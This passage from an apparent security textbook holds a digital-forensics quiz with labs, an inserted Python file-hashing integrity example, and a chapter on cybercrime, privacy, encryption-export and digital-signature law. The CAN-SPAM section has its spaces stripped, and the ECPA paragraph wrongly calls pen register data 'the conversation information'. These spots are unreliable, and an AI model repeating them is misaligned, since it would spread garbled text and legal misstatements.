D. The evidence is legally qualified and reliable.
2. Which of the following correctly defines evidence as being relevant?
A. The evidence is material to the case or has a bearing on the matter at hand.
B. The evidence is presented in the form of business records, printouts, or other items.
C. The evidence is convincing or measures up without question.
D. The evidence is legally qualified and reliable.
3. Which of the following correctly defines documentary evidence?
A. The evidence is presented in the form of business records, printouts, manuals, and other items.
B. The knowledge of the facts is obtained through the five senses of the witness.
C. The evidence is used to aid the jury and may be in the form of a model, experiment, chart, or other item and be offered to prove an event occurred.
D. Physical evidence that links the suspect to the scene of a crime.
4. Which of the following correctly defines real evidence?
A. The evidence is convincing or measures up without question.
B. The evidence is material to the case or has a bearing on the matter at hand.
C. The evidence is used to aid the jury and may be in the form of a model, experiment, chart, or other item and be offered to prove an event occurred.
D. Tangible objects that prove or disprove a fact.
5. Which of the following is the least rigorous investigative method?
A. Using a dedicated forensic workstation
B. Verifying software on a suspect system and using that software for the investigation
C. Examining the suspect system using its software without verification
D. Booting the suspect system with a verified floppy or CD, kernel, and tools
6. Which of the following correctly defines slack space?
A. The space on a disk drive that is occupied by the boot sector
B. The space located at the beginning of a partition
C. The remaining sectors of a previously allocated file that are available for the operating system to use
D. The unused space on a disk drive when a file is smaller than the allocated unit of storage
7. Which of the following correctly describes the minimum contents of an evidence control log book?
A. Description, Investigator, Case #, Date, Time, Location, Reason
B. Description, Investigator, Case #, Date, Location, Reason
C. Description, Case #, Date, Time, Location, Reason
D. Description, Coroner, Case #, Date, Time, Location, Reason
8. Which of the following correctly describes the chain of custody for evidence?
A. The evidence is convincing or measures up without question.
B. Accounts for all persons who handled or had access to a specific item of evidence.
C. Description, Investigator, Case #, Date, Time, Location, Reason.
D. The evidence is legally qualified and reliable.
9. Which of the following correctly defines the exclusionary rule?
A. Any evidence collected in violation of the Fourth Amendment is not admissible as evidence.
B. The evidence consists of tangible objects that prove or disprove a fact.
C. The knowledge of the facts is obtained through the five senses of the witness.
D. The evidence is used to aid the jury and may be in the form of a model, experiment, chart, or the like, offered to prove an event occurred.
10. Which of the following correctly defines free space?
A. The unused space on a disk drive when a file is smaller than the allocated unit of storage (such as a sector)
B. The space on a disk drive that is occupied by the boot sector
C. The space located at the beginning of a partition
D. The remaining sectors of a previously allocated file that are available for the operating system to use
Essay Quiz
1. A supervisor has brought to your office a confiscated computer that was allegedly used to view inappropriate material. He has asked you to look for evidence to support this allegation. Because you work for a small company, you do not have an extra computer you can dedicate to your analysis. How would you boot the system and begin forensic analysis? Provide a reason for your method.
2. Explain why you should always search the free space and slack space if you suspect a person has deliberately deleted files or information on a workstation that you are analyzing.
3. You have been asked by management to secure the laptop computer of an individual who was just dismissed from the company under unfavorable circumstances. Pretend that your own computer is the laptop that has been secured. Make the first entry in your log book and describe how you would start this incident off correctly by properly protecting and securing the evidence.
Lab Projects
• Lab Project 23.1 Use an MD5 or SHA-1 algorithm to obtain the hash value for a file of your choice. Record the hash value. Change the file with a word processor or text editor. Obtain the hash value for the modified file. Compare the result.
• Lab Project 23.2 To understand what information is stored on your computer, examine the contents of the Temporary Internet Files folders on your own computer. Review the file names and examine the contents of a few of the files. Describe how this information could be used as evidence of a crime.
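The hashing procedure that Lab Project 23.1 and the chapter summary describe (record a message digest at acquisition, re-hash later, compare) worked through as an added Python example; this is not code from the book. The sample file content, the examiner name, and the function names are constructed for the illustration, and the example goes slightly beyond the lab by storing several digests in a timestamped acquisition record, as an examiner would for a chain-of-custody log.

```python
import hashlib
import os
import tempfile
from datetime import datetime, timezone

# Constructed sample content standing in for the "file of your choice" in Lab Project 23.1.
SAMPLE_CONTENT = b"Meeting notes 2016-03-01: budget review, vendor contract.\n"


def hash_file(path, algorithm="sha256", chunk_size=1 << 20):
    """Return the hex digest of a file, read in chunks so a large disk image fits in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def acquisition_record(path, examiner, algorithms=("md5", "sha1", "sha256")):
    """Build the record stored at acquisition: what was hashed, when, by whom, and the digests.

    Several algorithms are recorded so that a later examiner can verify with whichever
    one their tooling supports (the lab names MD5 and SHA-1; SHA-256 is added here).
    """
    return {
        "path": os.path.basename(path),
        "size": os.path.getsize(path),
        "examiner": examiner,  # hypothetical examiner identifier
        "acquired_at": datetime.now(timezone.utc).isoformat(),
        "digests": {alg: hash_file(path, alg) for alg in algorithms},
    }


def verify_against_record(path, record):
    """Re-hash the file and return, per algorithm, whether it still matches the record."""
    return {alg: hash_file(path, alg) == digest for alg, digest in record["digests"].items()}


def demo():
    """Run the lab procedure on a temporary file and return (record, before, after)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "evidence.txt")
        with open(path, "wb") as fh:
            fh.write(SAMPLE_CONTENT)
        record = acquisition_record(path, examiner="examiner-01 (hypothetical)")
        before = verify_against_record(path, record)  # untouched file: every digest matches
        # The "change the file with a text editor" step: overwrite a single byte in place.
        with open(path, "r+b") as fh:
            fh.seek(8)
            fh.write(b"X")
        after = verify_against_record(path, record)  # one byte changed: no digest matches
        return record, before, after


if __name__ == "__main__":
    record, before, after = demo()
    for alg, digest in record["digests"].items():
        print(f"{alg:7} {digest}  intact={before[alg]}  after edit={after[alg]}")
```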
Chapter 24 Legal Issues and Ethics
If you have ten thousand regulations you destroy all respect for the law.
—WINSTON CHURCHILL
In this chapter, you will learn how to
Explain the laws and rules concerning importing and exporting encryption software
Identify the laws that govern computer access and trespass
Identify the laws that govern encryption and digital rights management
Describe the laws that govern digital signatures
Explore ethical issues associated with information security
Computer security is no different from any other subject in our society; as technological changes result in conflicts, laws are enacted to enable desired behaviors and prohibit undesired behaviors. The one substantial difference between this aspect of our society and others is that the speed of advancement in the information systems world as driven by business, computer network connectivity, and the Internet is much greater than in the legal system of compromise and lawmaking. In some cases, laws have been overly restrictive, limiting business options, such as in the area of importing and exporting encryption technology. In other cases, legislation has been slow in coming, and this fact has stymied business initiatives, such as in digital signatures. And in some areas, legislation has been both too fast and too slow, as in the case of privacy laws. One thing is certain: you will never satisfy everyone with a law, but it does delineate the rules of the game.
The cyber-law environment has not been fully defined by the courts. Laws have been enacted, but until they have been fully tested and explored by cases in court, the exact limits are somewhat unknown. This makes some aspects of interpretation more challenging, but the vast majority of the legal environment is known well enough that effective policies can be enacted to navigate this environment properly. Policies and procedures are tools you use to ensure understanding and compliance with laws and regulations affecting cyberspace.
Cybercrime
One of the many ways to examine cybercrime is to study how the computer is involved in the criminal act. Three types of computer crimes commonly occur: computer-assisted crime, computer-targeted crime, and computer-incidental crime. The differentiating factor is in how the computer is specifically involved from the criminal’s point of view. Just as crime is not a new phenomenon, neither is the use of computers, and cybercrime has a history of several decades.
Exam Tip: There are three forms of computer involvement in criminal activity:
The computer as a tool of the crime
The computer as a victim of a crime
The computer that is incidental to a crime
What is new is how computers are involved in criminal activities. The days of simple teenage hacking activities from a bedroom have been replaced by organized crime–controlled botnets (groups of computers commandeered by a malicious hacker) and acts designed to attack specific targets. The legal system has been slow to react, and law enforcement has been hampered by their own challenges in responding to the new threats posed by high-tech crime.
What comes to mind when most people think about cybercrime is a computer that is targeted and attacked by an intruder. The criminal attempts to benefit from some form of unauthorized activity associated with a computer. In the 1980s and ’90s, cybercrime was mainly virus and worm attacks, each exacting some form of damage, yet the gain for the criminal was usually negligible. Enter the 21st century, with new forms of malware, rootkits, and targeted attacks; criminals can now target individual users and their bank accounts. In the current environment it is easy to predict where this form of attack will occur—if money is involved, a criminal will attempt to obtain a cut. A common method of criminal activity is computer-based fraud. Advertising on the Internet is big business, and hence the “new” crime of click fraud is now a concern. Click fraud involves a piece of malware that defrauds the advertising revenue counter engine through fraudulent user clicks. The leader in the Internet auction space, eBay, and its subsidiary, PayPal, are frequent targets of fraud. Whether the fraud occurs by fraudulent listing, fraudulent bidding, or outright stealing of merchandise, the results are the same: a crime is committed. As users move toward online banking and stock trading, so moves the criminal element. Malware designed to install a keystroke logger and then watch for bank/brokerage logins is common on the Internet. Once the attacker finds the targets, he can begin looting accounts. His risk of getting caught and prosecuted is exceedingly low. Walk into a bank in the United States and rob it, and the odds are better than 95 percent that you will be doing time in federal prison after the FBI hunts you down and slaps the cuffs on your wrists. Do the same crime via a computer, and the odds are even better for the opposite: less than 1 percent of these attackers are caught and prosecuted.
The low risk of being caught is one of the reasons that criminals are turning to computer crime. Just as computers have become easy for ordinary people to use, the trend continues for the criminal element. Today’s cybercriminals use computers as tools to steal intellectual property or other valuable data and then subsequently market these materials through underground online forums. Using the computer to physically isolate the criminal from the direct event of the crime has made the investigation and prosecution of these crimes much more challenging for authorities.
The last way computers are involved with criminal activities is through incidental involvement. Back in 1931, the U.S. government used accounting records and tax laws to convict Al Capone of tax evasion. Today, similar records are kept on computers. Computers are also used to traffic child pornography and engage in other illicit activities—these computers act more as storage devices than as actual tools to enable the crime. Because child pornography existed before computers made its distribution easier, the computer is actually incidental to the crime itself.
With the three forms of computer involvement in criminal activities, multiplied by the myriad of ways a criminal can use a computer to steal or defraud, added to the indirect connection mediated by the computer and the Internet, computer crime of the 21st century is a complex problem indeed. Technical issues are associated with all the protocols and architectures. A major legal issue is the education of the entire legal system as to the serious nature of computer crimes. All these factors are further complicated by the use of the Internet to separate the criminal and his victim geographically. Imagine this defense: “Your honor, as shown by my client’s electronic monitoring bracelet, he was in his apartment in California when this crime occurred. The victim claims that the money was removed from his local bank in New York City. Now, last time I checked, New York City was a long way from Los Angeles, so how could my client have robbed the bank?”
Tech Tip
FBI Priorities
In the post-9/11 environment, federal law enforcement priorities shifted toward terrorism. During the reassessment of national law enforcement priorities, cyber-related crimes increased in importance, moving to number three on the FBI priority list. As of 2014, the priorities for the FBI are (www.fbi.gov/quickfacts.htm) as follows:
1. Protect the United States from terrorist attack.
2. Protect the United States against foreign intelligence operations and espionage.
3. Protect the United States against cyber-based attacks and high-technology crimes.
4. Combat public corruption at all levels.
5. Protect civil rights.
6. Combat transnational/national criminal organizations and enterprises.
7. Combat major white-collar crime.
8. Combat significant violent crime.
9. Support federal, state, local, and international partners.
10. Upgrade technology to successfully perform the FBI’s mission.
Common Internet Crime Schemes
To find crime, just follow the money. In the United States, the FBI and the National White Collar Crime Center (NW3C) have joined forces in developing the Internet Crime Complaint Center (IC3), an online clearinghouse that communicates issues associated with cybercrime. One of the items provided to the online community is a list of common Internet crime schemes and explanations of each (www.ic3.gov/crimeschemes.aspx). A separate list offers advice on how to prevent these crimes through individual actions (www.ic3.gov/preventiontips.aspx).
Sources of Laws
In the United States, three primary sources of laws and regulations affect our lives and govern our actions. A statutory law is passed by a legislative branch of government, be it the U.S. Congress or a local city council. Another source of laws and regulations is administrative bodies given power by other legislation. The power of government-sponsored agencies, such as the Environmental Protection Agency (EPA), the Federal Aviation Administration (FAA), the Federal Communications Commission (FCC), and others, lies in this powerful ability to enforce behaviors through administrative rulemaking, or administrative law. The last source of law in the United States is common law, or case law, which is based on previous events or precedent. This source of law comes from the judicial branch of government: judges decide on the applicability of laws and regulations.
Exam Tip: Three types of laws are commonly associated with cybercrime: statutory law, administrative law, and common law (also called case law).
All three sources have an involvement in computer security. Specific statutory laws, such as the Computer Fraud and Abuse Act (CFAA), govern behavior. The CFAA is designed to deal with cases of interstate computer fraud and cases of accessing national security information. The law has been amended several times to keep pace with technology. The primary charge from CFAA is typically one of accessing without authority, or exceeding authority on, a system involved with interstate commerce or national security. Administratively, the FCC and Federal Trade Commission (FTC) have made their presence felt in the Internet arena with respect to issues such as intellectual property theft and fraud. Common law cases are now working their ways through the judicial system, cementing the issues of computers and crimes into the system of precedents and constitutional basis of laws.
Computer Trespass
With the advent of global network connections and the rise of the Internet as a method of connecting computers between homes, businesses, and governments across the globe, a new type of criminal trespass can now be committed. Computer trespass is the unauthorized entry into a computer system via any means, including remote network connections. These crimes have introduced a new area of law that has both national and international consequences. For crimes that are committed within a country’s borders, national laws apply. For cross-border crimes, international laws and international treaties are the norm. Computer-based trespass can occur even if countries do not share a physical border. Computer trespass is treated as a crime in many countries. National laws against computer trespass exist in many countries, including Canada, the United States, and the member states of the European Union (EU). These laws vary by country, but they all have similar provisions defining the unauthorized entry into and use of computer resources for criminal activities. Whether called computer mischief as in Canada or computer trespass as in the United States, unauthorized entry and use of computer resources is treated as a crime with significant punishments. With the globalization of the computer network infrastructure, or Internet, issues that cross national boundaries have arisen and will continue to grow in prominence. Some of these issues are dealt with through the application of national laws upon request of another government. In the future, an international treaty may pave the way for closer cooperation.
Computer trespass is a convenient catchall law that can be used to prosecute cybercriminals when evidence of other criminal behavior, such as online fraud, identity theft, and so forth, is too weak to achieve a conviction.
Convention on Cybercrime
The Convention on Cybercrime is the first international treaty on crimes committed via the Internet and other computer networks. The convention is the product of four years of work by the Council of Europe (CoE), but also by the United States, Canada, Japan, and other non-CoE countries. The convention has been ratified and came into force in July 2004, and by September 2006, 15 member nations had also ratified it. The United States ratified it in the summer of 2006, with it entering into force in the United States in January 2007. One of the main objectives of the Convention, set out in the preamble, is “to pursue, as a matter of priority, a common criminal policy aimed at the protection of society against cybercrime, inter alia, by adopting appropriate legislation and fostering international cooperation.” This has become an important issue with the globalization of network communication. The ability to create a virus anywhere in the world and escape prosecution because of the lack of local laws has become a global concern.
The convention deals particularly with infringements of copyright, computer-related fraud, child pornography, and violations of network security. It also contains a series of powers and procedures covering, for instance, searches of computer networks and data interception. It has been supplemented by an additional protocol making any publication of racist and xenophobic propaganda via computer networks a criminal offense. This supplemental addition is in the process of separate ratification. One of the challenges of enacting elements such as this convention is the varying legal and constitutional structures from country to country. Simple statements such as a ban on child pornography, although clearly desirable, can run into complicating issues, such as constitutional protections of free speech in the United States. Because of such issues, this well-intended joint agreement will have variations across the political boundaries of the world.
Significant U.S. Laws
The United States has been a leader in the development and use of computer technology. As such, it has a longer history associated with computers, and with cybercrime. Because legal systems tend to be reactive and move slowly, this leadership position has translated into a leadership position from a legal perspective as well. The one advantage of this legal leadership position is the concept that once an item is identified and handled by the legal system in one jurisdiction, subsequent adoption in other jurisdictions is typically quicker.
Electronic Communications Privacy Act (ECPA)
The Electronic Communications Privacy Act (ECPA) of 1986 was passed by Congress and signed by President Reagan to address a myriad of legal privacy issues that resulted from the increasing use of computers and other technology specific to telecommunications. Sections of this law address e-mail, cellular communications, workplace privacy, and a host of other issues related to communicating electronically. Section I was designed to modify federal wiretap statutes to include electronic communications. Section II, known as the Stored Communications Act (SCA), was designed to establish criminal sanctions for unauthorized access to stored electronic records and communications. Section III covers pen registers and tap and trace issues. Tap and trace information is related to who is communicating with whom and when. Pen register data is the conversation information. A major provision of ECPA was the prohibition against an employer’s monitoring an employee’s computer usage, including e-mail, unless consent is obtained (for example, clicking Yes on a warning banner is considered consent). Other legal provisions protect electronic communications from wiretap and outside eavesdropping, as users are assumed to have a reasonable expectation of privacy and afforded protection under the Fourth Amendment to the Constitution.
Cross Check
Cybercrime and Privacy
Cybercrime and privacy are concepts that are frequently interconnected. Identity theft is one of the fastest-rising crimes. How does using your personal computer to access the Internet increase your risk in today’s world? Can you list a dozen specific risks you are personally exposed to? Privacy issues, being a significant topic in their own right, are covered in Chapter 25.
A common practice with respect to computer access today is the use of a warning banner. These banners are typically displayed whenever a network connection occurs and serve four main purposes. First, from a legal standpoint, they establish the level of expected privacy (usually none on a business system). Second, they serve notice to end users of the intent to conduct real-time monitoring from a business standpoint. Real-time monitoring can be conducted for security reasons, business reasons, or technical network performance reasons. Third, they obtain the user’s consent to monitoring. The key is that the banner tells users that their connection to the network signals their consent to monitoring. Consent can also be obtained to look at files and records. In the case of government systems, consent is needed to prevent direct application of the Fourth Amendment. And the last reason is that the warning banner can establish the system or network administrator’s common authority to consent to a law enforcement search.
Computer Fraud and Abuse Act (1986)
The Computer Fraud and Abuse Act (CFAA) of 1986, amended in 1994, 1996, in 2001 by the USA Patriot Act, and in 2008 by the Identity Theft Enforcement and Restitution Act, serves as the current foundation for criminalizing unauthorized access to computer systems. CFAA makes it a crime to knowingly access a computer that is either considered a government computer or used in interstate commerce, or to use a computer in a crime that is interstate in nature, which in today’s Internet-connected age can be almost any machine. The act sets financial thresholds for defining a criminal act, which were lowered by the Patriot Act, but in light of today’s investigation costs, these are easily met. The act also makes it a crime to knowingly transmit a program, code, or command that results in damage. Trafficking in passwords or similar access information is also criminalized. This is a wide-sweeping act, but the challenge of proving a case still exists.
ControllingtheAssaultofNon-SolicitedPornographyAndMarketingActof2003(CAN-SPAM)TheCAN-SPAMActwasanattemptbytheU.S.governmenttoregulatecommerciale-mailbyestablishingnationalguidelinesandgivingtheFTCenforcementpowers.Theobjectiveofthelegislationwastocurbunsolicitedcommerciale-mail,orspam.Theacthasapplicabilitytomobilephonesaswell.Heraldedasactiontocurbtheriseofspam,sinceitsenactment,theacthasaverypoorrecord.
TechTip
HeaderManipulationFalsifyingheaderinformationisaseriousviolationoftheCAN-SPAMAct.ThiscanbeconsideredanindicatorofcriminalormaliciousintentandcanbringtheattentionofotherlawenforcementagenciesbesidestheFTC.
CAN-SPAMallowsunsolicitedcommerciale-mailaslongasitadherestothreerulesofcompliance:
UnsubscribeItmustincludeanobviousopt-outprovisiontoallowuserstounsubscribe,withtheserequestsbeinghonoredwithintendays.
ContentThecontentmustbeclearandnotdeceptive.Adultcontentmustbeclearlylabeled,andsubjectlinesmustbeclearandaccurate.
SendingbehaviorThesendermustnotuseharvestede-mailaddresses,falsifyheaders,oruseopenrelays.
CAN-SPAMmakesspecificexemptionsfore-mailpertainingtoreligiousmessages,politicalmessages,andnationalsecuritymessages.Thelawalsoblockspeoplewhoreceivespamfromsuingspammersandrestrictsstatesfromenactingandenforcingstrongerantispamstatutes.ThelawdoespermitISPstosuespammers,andthishasbeenusedbysomemajorISPstopursuecasesagainstlarge-scalespamoperations.MajorfirmssuchasAOLhaveconsideredthelawusefulintheirbattleagainstspam.Regardedlargelyasineffective,statisticshaveshownthatveryfewprosecutionshavebeenpursuedbytheFTC.Theactpermitsbothcriminalchargesagainstindividualsandcivilchargesagainstentitiesinvolvedinsuspectedspammingoperations.
USA Patriot Act
The USA Patriot Act of 2001, passed in response to the September 11 terrorist attacks on the World Trade Center in New York City and the Pentagon building in Arlington, Virginia, substantially changed the levels of checks and balances in laws related to privacy in the United States. This law extends the tap and trace provisions of existing wiretap statutes to the Internet and mandates certain technological modifications at ISPs to facilitate electronic wiretaps on the Internet and for ISPs to cooperate with the government to aid monitoring. The act also permits the Justice Department to proceed with its rollout of the Carnivore program, an eavesdropping program for the Internet. Much controversy exists over Carnivore, but until it's changed, the Patriot Act mandates that ISPs cooperate and facilitate monitoring. In recent actions, the name Carnivore has been retired, but the right of the government to eavesdrop and monitor communications continues to be a hot topic and one where actions continue. The Patriot Act also permits federal law enforcement personnel to investigate computer trespass (intrusions) and enacts civil penalties for trespassers.
Tech Tip
Computer Misuse
Two major laws, ECPA and CFAA (as amended), provide wide-sweeping tools for law enforcement to convict people who hack into computers or use them to steal information. Both laws have been strengthened and provide significant federal penalties. These laws are commonly used to convict criminals of computer misuse, even when other charges may have applied.
Gramm-Leach-Bliley Act (GLBA)
In November 1999, President Clinton signed the Gramm-Leach-Bliley Act (GLBA), a major piece of legislation affecting the financial industry that includes significant privacy provisions for individuals. The key privacy tenets enacted in GLBA include the establishment of an opt-out method for individuals to maintain some control over the use of the information provided in a business transaction with a member of the financial community. GLBA is enacted through a series of rules governed by state law, federal law, securities law, and federal rules. These rules cover a wider range of financial institutions, from banks and thrifts, to insurance companies, to securities dealers. Some internal information sharing is required under the Fair Credit Reporting Act (FCRA) between affiliated companies, but GLBA ended sharing to external third-party firms.
Sarbanes-Oxley Act (SOX)
In the wake of several high-profile corporate accounting/financial scandals in the United States, the federal government in 2002 passed sweeping legislation, the Sarbanes-Oxley Act (SOX), overhauling the financial accounting standards for publicly traded firms in the United States. These changes were comprehensive, touching most aspects of business in one way or another. With respect to information security, one of the most prominent changes was the provision of Section 404 controls, which specify that all processes associated with the financial reporting of a firm must be controlled and audited on a regular basis. Since the majority of firms use computerized systems, this places internal auditors into the IT shops, verifying that the systems have adequate controls to ensure the integrity and accuracy of financial reporting. These controls have resulted in controversy over the cost of maintaining them versus the risk of not using them. Section 404 requires firms to establish a control-based framework designed to detect or prevent fraud that would result in misstatement of financials. In simple terms, these controls should detect insider activity that would defraud the firm. This has significant impacts on the internal security controls, because a system administrator with root-level access could perform many if not all tasks associated with fraud and would have the ability to alter logs and cover his tracks. Likewise, certain levels of power users of financial accounting programs would also have significant capability to alter records.
Privacy Laws
There is a wide range of privacy laws that are relevant to computers. There are laws for health care (HIPAA) and education records (FERPA), as well as other types of records including video rental records. These laws are described in detail in Chapter 25.
Payment Card Industry Data Security Standard (PCI DSS)
The payment card industry, including the powerhouses of MasterCard and Visa, through its PCI Security Standards Council designed a private-sector initiative to protect payment card information between banks and merchants. The Payment Card Industry Data Security Standard (PCI DSS) is a set of contractual rules governing how credit card data is to be protected (see the Tech Tip sidebar "PCI DSS Objectives and Requirements"). The current version is 3.1, which was released in April 2015. This is a voluntary, private-sector initiative that is prescriptive in its security guidance. Merchants and vendors can choose not to adopt these measures, but the standard has a steep price for noncompliance; the transaction fee for noncompliant vendors can be significantly higher, fines up to $500,000 can be levied, and in extreme cases the ability to process credit cards can be revoked.
Tech Tip
PCI DSS Objectives and Requirements
PCI DSS v3 includes six control objectives containing a total of 12 requirements:
1. Build and Maintain a Secure Network
Requirement 1: Install and maintain a firewall configuration to protect cardholder data
Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
2. Protect Cardholder Data
Requirement 3: Protect stored cardholder data
Requirement 4: Encrypt transmission of cardholder data across open, public networks
3. Maintain a Vulnerability Management Program
Requirement 5: Protect all systems against malware and regularly update antivirus software or programs
Requirement 6: Develop and maintain secure systems and applications
4. Implement Strong Access Control Measures
Requirement 7: Restrict access to cardholder data by business need-to-know
Requirement 8: Identify and authenticate access to system components
Requirement 9: Restrict physical access to cardholder data
5. Regularly Monitor and Test Networks
Requirement 10: Track and monitor all access to network resources and cardholder data
Requirement 11: Regularly test security systems and processes
6. Maintain an Information Security Policy
Requirement 12: Maintain a policy that addresses information security for all personnel
PCI DSS has two defined types of information, cardholder data and sensitive authentication data. The protection requirements established for these elements are detailed in Table 24.1.
Table 24.1  PCI DSS Data Retention Guidelines
Import/Export Encryption Restrictions
Encryption technology has been controlled by governments for a variety of reasons. The level of control varies from outright banning to little or no regulation. The reasons behind the control vary as well, and control over import and export is a vital method of maintaining a level of control over encryption technology in general. The majority of the laws and restrictions are centered on the use of cryptography, which was until recently used mainly for military purposes. The advent of commercial transactions and network communications over public networks such as the Internet has expanded the use of cryptographic methods to include securing of network communications. As is the case in most rapidly changing technologies, the practice moves faster than law. Many countries still have laws that are outmoded in terms of e-commerce and the Internet. Over time, these laws will be changed to serve these new uses in a way consistent with each country's needs.
U.S. Law
Export controls on commercial encryption products are administered by the Bureau of Industry and Security (BIS) in the U.S. Department of Commerce. The responsibility for export control and jurisdiction was transferred from the State Department to the Commerce Department in 1996 and updated on June 6, 2002. Rules governing exports of encryption are found in the Export Administration Regulations (EAR), 15 C.F.R. Parts 730–774. Sections 740.13, 740.17, and 742.15 are the principal references for the export of encryption items.
Tech Tip
Wassenaar Arrangement
The United States updated its encryption export regulations to provide treatment consistent with regulations adopted by the European Union, easing export and re-export restrictions among the EU member states and Argentina, Australia, Canada, Croatia, Japan, New Zealand, Norway, Republic of Korea, Russia, South Africa, Switzerland, Turkey, Ukraine, and the United States. The member nations of the Wassenaar Arrangement agreed to remove key-length restrictions on encryption hardware and software that is subject to certain reasonable levels of encryption strength. This action effectively removed "mass-market" encryption products from the list of dual-use items controlled by the Wassenaar Arrangement.
Violation of encryption export regulations is a serious matter and is not an issue to take lightly. Until recently, encryption protection was accorded the same level of attention as the export of weapons for war. With the rise of the Internet, widespread personal computing, and the need for secure connections for e-commerce, this position has relaxed somewhat. The U.S. encryption export control policy continues to rest on three principles: review of encryption products prior to sale, streamlined post-export reporting, and license review of certain exports of strong encryption to foreign government end users. The current set of U.S. rules requires notification to the BIS for export in all cases, but the restrictions are significantly lessened for mass-market products, as defined by all of the following:
They are generally available to the public by being sold, without restriction, from stock at retail selling points by any of these means:
Over-the-counter transactions
Mail-order transactions
Electronic transactions
Telephone call transactions
The cryptographic functionality cannot easily be changed by the user.
They are designed for installation by the user without further substantial support by the supplier.
When necessary, details of the items are accessible and will be provided, upon request, to the appropriate authority in the exporter's country in order to ascertain compliance with export regulations.
Mass-market commodities and software employing a key length greater than 64 bits for the symmetric algorithm must be reviewed in accordance with BIS regulations. Restrictions on exports by U.S. persons to terrorist-supporting states, as determined by the U.S. Department of State (currently Iran, Sudan, and Syria), their nationals, and other sanctioned entities are not changed by this rule.
As you can see, this is a very technical area, with significant rules and significant penalties for infractions. The best rule is that whenever you are faced with a situation involving the export of encryption-containing software, first consult an expert and get the appropriate permission or a statement that permission is not required. This is one case where it is better to be safe than sorry.
Non-U.S. Laws
Export control rules for encryption technologies fall under the Wassenaar Arrangement, an international arrangement on export controls for conventional arms and dual-use goods and technologies (see the Tech Tip sidebar, "Wassenaar Arrangement"). The Wassenaar Arrangement was established to contribute to regional and international security and stability by promoting transparency and greater responsibility in transfers of conventional arms and dual-use goods and technologies, thus preventing destabilizing accumulations. Participating states, of which the United States is one of 41, will seek, through their own national policies and laws, to ensure that transfers of these items do not contribute to the development or enhancement of military capabilities that undermine these goals, and are not diverted to support such capabilities.
Tech Tip
Cryptographic Use Restrictions
In addition to the export controls on cryptography, significant laws prohibit the use and possession of cryptographic technology. In China, a license from the state is required for cryptographic use. In some other countries, including Russia, Pakistan, Venezuela, and Singapore, tight restrictions apply to cryptographic uses. France relinquished tight state control over the possession of the technology in 1999. One of the driving points behind France's action is the fact that more and more of the Internet technologies have built-in cryptography.
Many nations have more restrictive policies than those agreed upon as part of the Wassenaar Arrangement. Australia, New Zealand, the United States, France, and Russia go further than is required under Wassenaar and restrict general-purpose cryptographic software as dual-use goods through national laws. The Wassenaar Arrangement has had a significant impact on cryptography export controls, and there seems little doubt that some of the nations represented will seek to use the next round to move toward a more repressive cryptography export control regime based on their own national laws. There are ongoing campaigns to attempt to influence other members of the agreement toward less restrictive rules or, in some cases, no rules. These lobbying efforts are based on e-commerce and privacy arguments. Digital rights management, secure USB solutions, digital signatures, and Secure Sockets Layer (SSL)–secured connections are examples of common behind-the-scenes use of cryptographic technologies. In 2007, the United Kingdom passed a new law mandating that when requested by UK authorities, either police or military, encryption keys must be provided to permit decryption of information associated with terror or criminal investigation. Failure to deliver either the keys or decrypted data can result in an automatic prison sentence of two to five years. Although this seems reasonable, it has been argued that such actions will drive certain financial entities offshore, as the rule applies only to data housed in the United Kingdom. As for deterrence, the two-year sentence may be lighter than a conviction for trafficking in child pornography; hence the law seems not to be as useful as it seems at first glance.
Digital Signature Laws
Whether a ring and wax seal, a stamp, or a scrawl indicating a name, signatures have been used to affix a sign of one's approval for centuries. As communications have moved into the digital realm, signatures need to evolve with the new medium, and hence digital signatures were invented. Using elements of cryptography to establish integrity and nonrepudiation, digital signature schemes can actually offer more functionality than their predecessors in the paper-based world.
U.S. Digital Signature Laws
On October 1, 2000, the Electronic Signatures in Global and National Commerce Act (commonly called the E-Sign law) went into effect in the United States. This law implements a simple principle: a signature, contract, or other record may not be denied legal effect, validity, or enforceability solely because it is in electronic form. Another source of law on digital signatures is the Uniform Electronic Transactions Act (UETA), which was developed by the National Conference of Commissioners on Uniform State Laws (NCCUSL) and has been adopted in all but four states—Georgia, Illinois, New York, and Washington—which have adopted a non-uniform version of UETA. The precise relationship between the federal E-Sign law and UETA has yet to be resolved and will most likely be worked out through litigation in the courts over complex technical issues. Many states have adopted digital signature laws, the first being Utah in 1995. The Utah law, which has been used as a model by several other states, confirms the legal status of digital signatures as valid signatures, provides for use of state-licensed certification authorities, endorses the use of public key encryption technology, and authorizes online databases called repositories, where public keys would be available. The Utah act specifies a negligence standard regarding private encryption keys and places no limit on liability. Thus, if a criminal uses a consumer's private key to commit fraud, the consumer is financially responsible for that fraud, unless the consumer can prove that he or she used reasonable care in safeguarding the private key. Consumers assume a duty of care when they adopt the use of digital signatures for their transactions, not unlike the care required for PINs on debit cards.
Try This!
Digital Signature Agreements
Digital signatures are becoming more common in everyday use. When a person signs up with a bank for electronic banking services, or with a brokerage account for online trading, that person typically agrees to electronic signatures. Using your bank or brokerage account—or if you don't have one, there are free online financial service firms you can sign up for—review the online agreement for electronic signature provisions.
From a practical standpoint, the existence of the E-Sign law and UETA has enabled e-commerce transactions to proceed, and the resolution of the technical details via court actions will probably have little effect on consumers beyond the need to exercise reasonable care over their signature keys. For the most part, software will handle these issues for the typical user.
UN Digital Signature Laws
The United Nations has a mandate to further harmonize international trade. With this in mind, the UN General Assembly adopted in 1996 the United Nations Commission on International Trade Law (UNCITRAL) Model Law on Electronic Commerce. To implement specific technical aspects of this model law, more work on electronic signatures was needed. The General Assembly then adopted in 2001 the UNCITRAL Model Law on Electronic Signatures. These model laws have become the basis for many national and international efforts in this area.
Canadian Digital Signature Laws
